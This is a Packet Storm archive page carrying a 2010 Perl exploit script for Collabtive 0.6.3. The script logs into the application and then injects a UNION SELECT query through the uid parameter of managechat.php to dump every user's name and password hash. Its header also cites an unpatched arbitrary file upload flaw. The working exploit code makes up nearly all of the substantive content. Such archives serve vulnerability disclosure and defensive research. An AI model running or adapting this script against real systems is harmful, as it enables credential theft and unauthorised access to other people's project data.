what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Collabtive 0.6.3 SQL Injection

Collabtive 0.6.3 SQL Injection
Posted Jun 14, 2010
Authored by DNX

Collabtive version 0.6.3 remote SQL injection exploit.

tags | exploit, remote, sql injection
SHA-256 | 9ec3e039605c32c504e4bacd2beade84a8f7046a9838022866aafe5849bc673b

Collabtive 0.6.3 SQL Injection

Change Mirror Download
#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Request::Common qw(POST);
use HTTP::Cookies;
use Getopt::Long;

# \#'#/
# (-.-)
# ------------------oOO---(_)---OOo-----------------
# | __ __ |
# | _____/ /_____ ______/ /_ __ ______ ______ |
# | / ___/ __/ __ `/ ___/ __ \/ / / / __ `/ ___/ |
# | (__ ) /_/ /_/ / / / /_/ / /_/ / /_/ (__ ) |
# | /____/\__/\__,_/_/ /_.___/\__,_/\__, /____/ |
# | Security Research Division /____/ 2o1o |
# --------------------------------------------------
# | Collabtive v0.6.3 Multiple Vulnerabilities |
# --------------------------------------------------
# [!] Discovered by.: DNX
# [!] Homepage......: http://starbugs.host.sk
# [!] Vendor........: http://collabtive.o-dyn.de
# [!] Detected......: 04.06.2010
# [!] Reported......: 05.06.2010
# [!] Response......: xx.xx.2010
#
# [!] Background....: Collabtive ist eine web-basierte Projektmanagementsoftware.
# Das Projekt startete im November 2007. Es ist eine
# Open-Source-Software und stellt eine Alternative zu proprietären
# Werkzeugen wie Basecamp dar. Collabtive ist in PHP geschrieben.
#
# Collabtive wird von einem professionellen Team entwickelt.
#
# [!] Requirements..: Account needed
#
# [!] Bug...........: $_GET['uid'] in managechat.php near line 64
#
# 12: $userto_id = getArrayVal($_GET, "uid");
#
# 64: $sel = mysql_query("SELECT * FROM chat WHERE ufrom_id IN($userid,$userto_id) AND userto_id IN($userid,$userto_id) AND time > $start ORDER by time ASC");
#
# The password is encoded with sha1.
#
# [!] Bug...........: The arbitrary file upload discovered by USH is still present.
# See http://www.milw0rm.com/exploits/7076 more details.
#

if(!$ARGV[5])
{
print "\n \\#'#/ ";
print "\n (-.-) ";
print "\n ---------------oOO---(_)---OOo---------------";
print "\n | Collabtive v0.6.3 SQL Injection Exploit |";
print "\n | coded by DNX |";
print "\n ---------------------------------------------";
print "\n[!] Usage: perl collabtive.pl [Host] [Path] <Options>";
print "\n[!] Example: perl collabtive.pl 127.0.0.1 /collabtive/ -user test -pass 12345";
print "\n[!] Options:";
print "\n -user [text] Username";
print "\n -pass [text] Password";
print "\n -p [ip:port] Proxy support";
print "\n";
exit;
}

my %options = ();
GetOptions(\%options, "user=s", "pass=s", "p=s");
my $ua = LWP::UserAgent->new();
my $cookie = HTTP::Cookies->new();
my $host = $ARGV[0];
my $path = $ARGV[1];
my $target = "http://".$host.$path;
my $user = "";
my $pass = "";

if($options{"p"}) { $ua->proxy('http', "http://".$options{"p"}); }
if($options{"user"}) { $user = $options{"user"}; }
if($options{"pass"}) { $pass = $options{"pass"}; }

print "[!] Exploiting...\n\n";

exploit();

print "\n[!] Done\n";

sub exploit
{
##############
# make login #
##############

my $url = $target."manageuser.php?action=login";
my $res = $ua->post($url, [username => $user, pass => $pass]);
$cookie->extract_cookies($res);
$ua->cookie_jar($cookie);

############################
# get users with passwords #
############################

$url = $target."managechat.php?action=pull&uid=0) union select 1,2,name,4,5,6,pass from user/*";
$res = $ua->get($url);
my $content = $res->content;

my @c = split(/<br \/>/, $content);
foreach (@c)
{
if($_ =~ /<b>(.*?):<\/b> (.*)/)
{
print $1.":".$2."\n";
}
}
}
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close